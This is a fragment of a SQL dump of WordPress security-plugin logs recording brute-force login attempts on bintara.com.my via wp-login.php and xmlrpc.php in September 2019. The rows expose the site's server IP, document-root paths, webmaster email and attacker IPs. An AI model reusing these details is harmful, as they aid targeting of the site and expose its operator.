22:51:17',17739920,19230424,'https://bintara.com.my/wp-login.php',1,0,'153.126.195.38'),(24781,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"60790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFjZyR0vdvYEIduPCLPxQAAAQM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568760679.344\";s:12:\"REQUEST_TIME\";s:10:\"1568760679\";}}','notice','2019-09-17 22:51:20','2019-09-17 22:51:19',18255672,19554536,'https://bintara.com.my/xmlrpc.php',1,0,'153.126.195.38'),(24782,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.209.144.199\";s:11:\"REMOTE_PORT\";s:5:\"52564\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFmfyqbKGlf1IVly7N@NgAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568761471.1577\";s:12:\"REQUEST_TIME\";s:10:\"1568761471\";}}','notice','2019-09-17 23:04:32','2019-09-17 23:04:31',17739920,19229712,'https://bintara.com.my/wp-login.php',1,0,'103.209.144.199'),(24783,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"103.209.144.199\";s:11:\"REMOTE_PORT\";s:5:\"54406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFmgW4SfF9g@8lNlxwj4AAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568761473.7417\";s:12:\"REQUEST_TIME\";s:10:\"1568761473\";}}','notice','2019-09-17 23:04:35','2019-09-17 23:04:34',18255464,19555472,'https://bintara.com.my/xmlrpc.php',1,0,'103.209.144.199'),(24784,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"37689\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFpE0QGijxhVPhG1M0BlwAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568762131.825\";s:12:\"REQUEST_TIME\";s:10:\"1568762131\";}}','notice','2019-09-17 23:15:33','2019-09-17 23:15:32',17740024,19231120,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24785,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"37985\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFpF24SfF9g@8lNlxwkFQAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762135.3694\";s:12:\"REQUEST_TIME\";s:10:\"1568762135\";}}','notice','2019-09-17 23:15:36','2019-09-17 23:15:35',18255992,19555248,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(24786,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.170.209.246\";s:11:\"REMOTE_PORT\";s:5:\"51178\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFrHY75s89pqgR69SLllAAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762653.8716\";s:12:\"REQUEST_TIME\";s:10:\"1568762653\";}}','notice','2019-09-17 23:24:15','2019-09-17 23:24:14',17739800,19231032,'https://bintara.com.my/wp-login.php',1,0,'107.170.209.246'),(24787,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.170.209.246\";s:11:\"REMOTE_PORT\";s:5:\"51646\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFrICqbKGlf1IVly7N-PAAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762656.7458\";s:12:\"REQUEST_TIME\";s:10:\"1568762656\";}}','notice','2019-09-17 23:24:18','2019-09-17 23:24:17',18257216,19556208,'https://bintara.com.my/xmlrpc.php',1,0,'107.170.209.246'),(24788,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"33008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFsDiqbKGlf1IVly7N-ZAAAAUE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762894.9862\";s:12:\"REQUEST_TIME\";s:10:\"1568762894\";}}','notice','2019-09-17 23:28:16','2019-09-17 23:28:15',17739856,19230680,'https://bintara.com.my/wp-login.php',1,0,'116.203.198.2'),(24789,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.203.198.2\";s:11:\"REMOTE_PORT\";s:5:\"33370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFsEY75s89pqgR69SLl9AAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568762897.72\";s:12:\"REQUEST_TIME\";s:10:\"1568762897\";}}','notice','2019-09-17 23:28:19','2019-09-17 